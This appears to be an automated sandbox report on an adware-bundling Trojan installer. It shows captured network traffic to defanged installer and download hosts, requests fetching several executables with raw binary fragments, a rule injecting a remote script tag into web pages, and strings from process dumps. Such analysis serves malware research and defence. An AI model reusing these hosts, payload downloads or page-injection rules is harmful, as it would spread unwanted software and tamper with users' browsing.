= '37.57.16.189';..var g_browser = 'ie';..var g_cnt = '3ad80c247cbd60f855b8cf1954a59b1b';..var g_ver = '1.1.2.41';..var g_buttonImage = 1;..var g_thanks = 'thankyou.php';..var g_images = [];..var g_purl = 'hXXp://VVV.amoninst.com:80/pix.php';..var g_skipCats = 0;..var g_ieVer = '6.0';..var g_chVer = '';..var g_ffVer = '';..var g_netfs = -31;..var g_vert = 3;..var g_os = "NT5.1SP3";..var g_current_screen = '';..var g_custom_next_button_event = '0';..var g_custom_next_button = '0';..var g_install_all = 0;....function InitInstall()..{.. g_ami.AddThanksParameter('tid', g_tid);..
<<< skipped >>>
POST /finalize.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.amoninst.com/index.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.amoninst.com
Content-Length: 229
Connection: Keep-Alive
Cache-Control: no-cache
_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_cid=9664&_psb=0&_cnt=da721c907b6c24eb05606fcf5cf1c485&_instid=&_brw=ie&_fc=0&_appname=&_appimageurl=&_netfs=-31&_vert=3&r_updater=0&r_MyBestOffersTodayBR=0.01&updater=3&MyBestOffersTodayBR=2
HTTP/1.1 200 OK
Content-Type: text/xml
Date: Thu, 23 Apr 2015 07:24:28 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 2409
Connection: keep-alive
....<Array><page><f>1</f><fb>1</fb><pt>0</pt><cats>0</cats><updh>1</updh><wrn></wrn><comps></comps><must_show>0</must_show><bdy>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 IGFuZCA8YSBocmVmPSJodHRwOi8vZ29vLmdsL1NIcDhSZyIgdGFyZ2V0PSJfYmxhbmsiPlByaXZhY3kgUG9saWN5PC9hPiBhbmQgY29uc2VudCB0byBpbnN0YWxsIE15IEJlc3QgT2ZmZXJzIFRvZGF5Ljwvc3Bhbj48L2Rpdj48L2Rpdj48aW5wdXQgdHlwZT0iaGlkZGVuIiB2YWx1ZT0iMSIgaWQ9ImlfYW1pX3VwZGF0ZXIiLz48aW5wdXQgdHlwZT0iaGlkZGVuIiB2YWx1ZT0idXBkYXRlcixNeUJlc3RPZmZlcnNUb2RheUJSIiBpZD0iYWxsX3Nob3J0X25hbWVzIi8 </bdy><img>__empty__</img></page><page><f>1</f><fb>0</fb><pt>1</pt><cats>0</cats><updh>1</updh><wrn></wrn><comps></comps><must_show>0</must_show><bdy>DQo8
<<< skipped >>>
POST /thankyou.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.amoninst.com
Connection: Keep-Alive
Content-Length: 1340
_srvlog=&browser=ie&c[MyBestOffersTodayBR][r]=0.01&c[MyBestOffersTodayBR][s]=-1&c[updater][r]=0&c[updater][s]=-1&capp=updater&cc=UA&cid=9664&clip=37.57.16.189&cmdl=amisetup5755__9664.exe /s /ver 1.1.2.41 /u http://VVV.amoninst.com/index.php /ta /ci 9664 /i MyBestOffersTodayBR&cnt=3ad80c247cbd60f855b8cf1954a59b1b¤t_screen=Finish_Last_Screen&is=-31&netfs=-31&os=NT5.1SP3&sysid=B3920CF566AB717F84CE9CE32F62B904&sysid1=B3920CF566AB717F84CE9CE32F62B904&te=1429773860&tid=&ts=1429773854&ver=1.1.2.41&vert=3&mh=91c1b2cbe72cfa41cf10f8484f47dffe909b4dcf&base=_srvlog=&browser=ie&c%5BMyBestOffersTodayBR%5D%5Br%5D=0.01&c%5BMyBestOffersTodayBR%5D%5Bs%5D=-1&c%5Bupdater%5D%5Br%5D=0&c%5Bupdater%5D%5Bs%5D=-1&capp=updater&cc=UA&cid=9664&clip=37.57.16.189&cmdl=amisetup5755__9664.exe+%2Fs++%2Fver+1.1.2.41++%2Fu+http%3A%2F%2FVVV.amoninst.com%2Findex.php+%2Fta+%2Fci+9664+%2Fi+MyBestOffersTodayBR&cnt=3ad80c247cbd60f855b8cf1954a59b1b¤t_screen=Finish_Last_Screen&is=-31&netfs=-31&os=NT5.1SP3&sysid=B3920CF566AB717F84CE9CE32F62B904&sysid1=B3920CF566AB717F84CE9CE32F62B904&te=1429773860&tid=&ts=1429773854&ver=1.1.2.41&vert=3
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Thu, 23 Apr 2015 07:24:29 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
.... ..
GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.dlzip1.istartsurf.finish,9 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:17 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
Content-Encoding: gzip
57.............V*.I,)V.R..V.Q*..M.....L.r......... .....T.C......<............T..Z.....H.....0..
GET /services/rules.txt?dummy=243 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.ninjasoftwarellc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:37 GMT
Content-Type: text/plain
Content-Length: 180
Connection: keep-alive
Last-Modified: Thu, 26 Mar 2015 16:45:36 GMT
ETag: "57c94d-b4-51233beb94c00"
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: EU
Accept-Ranges: bytes
</head>|<script src="hXXps://VVV.njaxjs.me/services/script.js"></script></head>.{njax_null}|<script src="hXXps://VVV.njaxjs.me/services/script.js" type="text/javascript"></script>.
GET /services/update.php?v=1.2.0&key=FVz40gdklAiQUMMUD3ARa8NDKI9Pp0VX&dummy=708 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.ninjasoftwarellc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:38 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="Potato"
X-Cache: BYPASS
X-Server: Provided by Intermedia
X-Country: EU
GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.hp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:28 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.56 ms","message":"store 1 action and 0 update "}..0..
GET /3517/2 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.tjepgz.cc
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Thu, 23 Apr 2015 04:24:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Location: hXXp://VVV.tjepgz.cc/files/zip_r3/3517_89d09a830004d94b9f646d24de15e7f2/2.zip
0......
GET /files/zip_r3/3517_89d09a830004d94b9f646d24de15e7f2/2.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.tjepgz.cc
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 23 Apr 2015 04:24:07 GMT
Content-Type: application/zip
Content-Length: 2975087
Last-Modified: Tue, 14 Apr 2015 08:23:03 GMT
Connection: keep-alive
ETag: "552cce67-2d656f"
Accept-Ranges: bytes
PK...........F................479.db.../.u.>p..m....<..A#.<y....\..-2...a7."....}.zx....(....N.J8...t.J.-Q..C$....G.!;Q`..%...D.>uZ....s.L........* ...i.5A.`.....j._\.....e.M. ..}.....\.3.[......m.....Z......5oV.Q7..c.x......U...5...........6OsxTJniPK..........bF]=..............wpm_v20.0.0.1953_0302.exe..S.nM....m....m..m..m..l..m.:.\...E....s{.*F.5j.......z.......T.C.t.f.,f..y.^.a.....P.3.O^:.~L....(.......Z..,...R...xN......*g...2.._.i.y..A[7..K%...W... Jn.ET.d3.8.A.Rpi>..E..}.......Eb.L/..../.Q.../..q...........[.VZ..4_..J.4.(...{..SQ....f....*.....1.}BO..........gD..?..|od...W..].6..a.E....*Rz...&...G.....5.dW ..nD7&..4C2......zb.Be..[....T(b...rj..4X....g........u>Y..~..D!...5.Z...w.....w.[...N......M.........i....l..3..."..W7.D.t.........Cv.r.-........N..1..B...<.......zI.......G.F#Al...;..L..[.j.g.w._...~z.../......s...h]..R........K...1....v}~..].....Rd]?a....#.".]r..-..x....Z...z|`.......x..)..4/...........N..aQG...lq.4`..`....d>.....wGyf.q.RzN.....9,.t.Rr..=......M.%....l[>..Bt.<...D..G..S4.$s.g..... ...Y.N.h`..Y...3.5.m."..Pfc%j..$.....R...J..i..x...?J.T.)L..@%......F9..L.#..`}7....q.%....sj.]. ...r.../z..Ff.<x-b.d..P..pE..l`k.?:n..Aq.....<..F.....^..r...7.b\....}.,$.p)<..Q.....U.>.D.....@}4u.....N....#..A 4g2.uU.r}"......#X....d.{.)..........R..m.DR.d.2.......o#....30O......(g(H.Aro...0.P....tt5.7@W4;....BR.J1^Lf....H'..q...HMA..of.]w#..?..I..~>FL2.T.v:.&\..${.KB......o.Z.R.&.<....Zf)...".D<...@_.....WE....*.[\.b..W._?.S{.x..,....pP...qC\. ....zC...
<<< skipped >>>
GET /v4/sof-ient/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action0=xa.geoip&action2=visit&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,2.8.8.2102&update4=chptid,pcm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:58 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.53 ms","message":"store 3 action and 5 update "}..0......
GET /v4/sof-ient/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action1=install.pcm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:58 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.54 ms","message":"store 1 action and 0 update "}..0..
GET /310714d/240714_ps.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:27 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 523264
Content-Description: File Transfer
Content-Disposition: attachment; filename="240714_ps.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z....... ...0.......p....@.......................... ...............................................s.......................................................................................p...............................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data...x............p..............@....ndata.......p...........................rsrc................t..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....nD..H.P.u..u..u...Hr@..B...SV.5.nD..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h..D.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...nD...Si.. ..VW.T.....tO.q.3.;5.nD.sB..i.. ...D.......t.G.....t...O..t .....u...3....3...F.. ..;5.nD.r._^[...U..QQ.U.SV..i.. .
<<< skipped >>>
GET /310714d/310714_a9.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:29 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 503904
Content-Description: File Transfer
Content-Disposition: attachment; filename="310714_a9.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........;...;...;...]r_.|....<V.<....Z\......Z^.p....Z_.....2...(...;.......]rB.6...]rX.:...;...:...]r].:...Rich;...................PE..L...X,.U.................<...T......3o.......P....@..................................t....@..................................i..........................`........;..`S..8............................D..@............P...............................text....:.......<.................. ..`.rdata...(...P...*...@..............@..@.data....g.......F...j..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................U..V...y-...E..t.V..6.......^]...................O-.............U..j.h.;E.d.....P.... .F.3..E.VWP.E.d........}.j..u...&...E......F......F...F......F..3..F.....f.F..F.f.F .F$.F(.F,.F0.E....u(.E.P.M..E...F..P,..h.YF..E.P.E. bE..%e..WV..#........M.d......Y_^.M.3..4 ....]....V..V..$...F,.....t.P..3......F,.....F$..t.P..3......F$.....F...t.P..3......F......F...t.P..3......F......F...t.P..3......F......F...t.P..3......F.......^..%....U..V.u..... .... bE...^]........U...E..V....daE.t.V.
<<< skipped >>>
GET /310714d/310714_am2.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:33 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 311296
Content-Description: File Transfer
Content-Disposition: attachment; filename="310714_am2.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x....u...u...u..a....u..o....u.3W....u.......u.....7.u.......u..a....u...t.*.u.......u.......u.......u.Rich..u.........................PE..L......T..........................................@.......................................@..................................|..........(........................)..................................xR..@...............L............................text............................... ..`.rdata..............................@..@.data....:...........v..............@....rsrc...(...........................@..@.reloc...).......*..................@..B........................................................................................................................................................................................................................................................................................................................j...4...............................t.j.j.j.P....D...P....D.....................3.9.................t.j.j.j.P....D...P....D....>....................t.j.j.j.P....D...P....D.....3..H..H.........3....D....D..|.D..x.D....D..x.D..................=\.D..u.3...=`.D...L.D.s..L.D..U..j.h..C.d.....PSVW.D.D.3.P.E.d......E..}....LD......3.3..O.._.f.W..]..O8._4f.W$.w@.E...N.3..^.f.....Q..U....I.f.....f;.u. M...Q.*....GtHJD.................._x............................................_l._p.......Gh....._`._d.........
<<< skipped >>>
GET /services/stores?dummy=526 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.related.deals
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:14 GMT
Content-Type: text/html
Connection: close
P3P: CP="Potato"
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Origin: *
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: EU
related.deals.aliexpress.com.viagens.americanas.com.br.americanas.com.br.azulviagens.com.br.casasbahia.com.br.catho.com.br.centauro.com.br.citylar.com.br.colcci.com.br.colombo.com.br.cvc.com.br.dafiti.com.br.decolar.com.extra.com.br.fastshop.com.br.fnac.com.br.forum.com.br.girafa.com.br.voegol.com.br.insinuante.com.br.kanui.com.br.lenovo.com.br.lojaskd.com.br.magazineluiza.com.br.marisa.com.br.megamamute.com.br.mobly.com.br.netshoes.com.br.polishop.com.br.pontofrio.com.br.posthaus.com.br.ricardoeletro.com.br.rihappy.com.br.samsclub.com.br.saraiva.com.br.sepha.com.br.sephora.com.br.shopfato.com.br.shoptime.com.br.submarino.com.br.submarinoviagens.com.br.tam.com.br.walmart.com.br...
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_1396:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
ShowWebInPopUp
\LOCALS~1\Temp\nst3.tmp\nsWeb.dll
B3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe
ndex.php /ta /ci 9664 /i MyBestOffersTodayBR
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp\nsWeb.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp
n%D,3
GetProcessHeap
OLEAUT32.dll
CreateURLMoniker
urlmon.dll
WININET.dll
nsWeb.dll
ShowWebInPage
MSHTML.DLL
1 1$1(1,1014181
t%SSj
GetWindowsDirectoryW
RegEnumKeyExW
RegEnumKeyExA
RegCreateKeyExW
RegOpenKeyExW
RegDeleteKeyW
registry.dll
_CopyKey
_CreateKey
_DeleteKey
_DeleteKeyEmpty
_KeyExists
_MoveKey
_RestoreKey
_SaveKey
.reloc
System.dll
callback%d
@.reloc
d2.kX
W.uje
nst3.tmp
\LOCALS~1\Temp\nst3.tmp
3886080
c:\%original file name%.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
-2063532032
-2147284440
Nullsoft Install System v2.46
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
%s /s "%s"
regedit.exe
REG_KEY
%s%s%s
x,
=hex(%x):
=dword:x
="%s"
[%s\%s]
[-%s\%s]
Windows Registry Editor Version 5.00
7.8.5.9
%original file name%.exe_1396_rwx_01134000_00001000:
callback%d
q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe_1316:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
ShowWebInPopUp
\LOCALS~1\Temp\nsq6.tmp\nsWeb.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq6.tmp\nsWeb.dll
%Program Files%
\nsWeb.dll
hXXp://goo.gl/Bw14Po
$$\wininit.ini
@.reloc
n%D,3
GetProcessHeap
OLEAUT32.dll
CreateURLMoniker
urlmon.dll
WININET.dll
nsWeb.dll
ShowWebInPage
MSHTML.DLL
1 1$1(1,1014181
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq6.tmp
nsq6.tmp
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq6.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Temp\O15O8WbPqkjNWDUfU8L4Mr8GpVb15O8WbPqkjNWDUfU8L4Mr8GpVb
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N
q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl4.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
8.9.3.9
310714_is.exe_1880:
.idata
.rdata
P.reloc
P.rsrc
SYh%f
kernel32.dll
.DEFAULT\Control Panel\International
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
LzmaDecode failed (%d)
shell32.dll
/SL5="$%x,%d,%d,
Inno Setup Setup Data (5.5.0)
Inno Setup Messages (5.5.0)
user32.dll
oleaut32.dll
advapi32.dll
RegOpenKeyExA
RegCloseKey
GetWindowsDirectoryA
MsgWaitForMultipleObjects
ExitWindowsEx
comctl32.dll
name="JR.Inno.Setup"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
true
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
External exception %x
Web Setup
5.3.2.4
2.0.7
310714_is.tmp_1388:
.text
`.rdata
@.data
.rsrc
@.reloc
c:\Projects\Basic\Release\Basic.pdb
KERNEL32.dll
USER32.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
MSVCR90.dll
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
CashReminder.exe_1232:
.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeywordp
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeywordT
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecutepWE
content-security-policy-report-only
127.0.0.1
255.0.0.0
ServiceExecute
\P_StoreList.txt
\P_CheckUpdate.txt
\cr_update.exe
hXXp://VVV.related.deals/services/rules?dummy=
hXXp://VVV.related.deals/services/stores?dummy=
hXXp://VVV.related.deals/services/update/
\P_RuleList.txt
[N] ProductKey :
cmd.exe /c net start CashReminder
cmd.exe /c net stop CashReminder
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation
WNet.exe_2284:
.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeywordp
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeywordT
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
